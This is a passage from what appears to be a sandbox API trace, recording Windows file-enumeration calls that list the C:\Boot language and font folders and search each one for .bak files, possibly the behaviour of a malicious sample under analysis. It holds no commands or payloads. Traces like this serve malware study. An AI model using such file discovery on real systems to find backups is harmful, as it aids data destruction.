lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.073] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.073] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.073] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.073] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.074] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.074] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.075] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.075] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.075] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.075] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.076] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.076] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.076] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.077] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.077] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.077] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.077] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28784, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29114, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20718, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0156.082] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20d6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2553c, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x22b2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x23b34, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d20, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae62bb5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12e5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0156.084] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.085] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.086] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.087] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.088] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.093] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.093] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.104] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.104] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.104] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.104] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.104] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.105] FindFirstFileW (in: 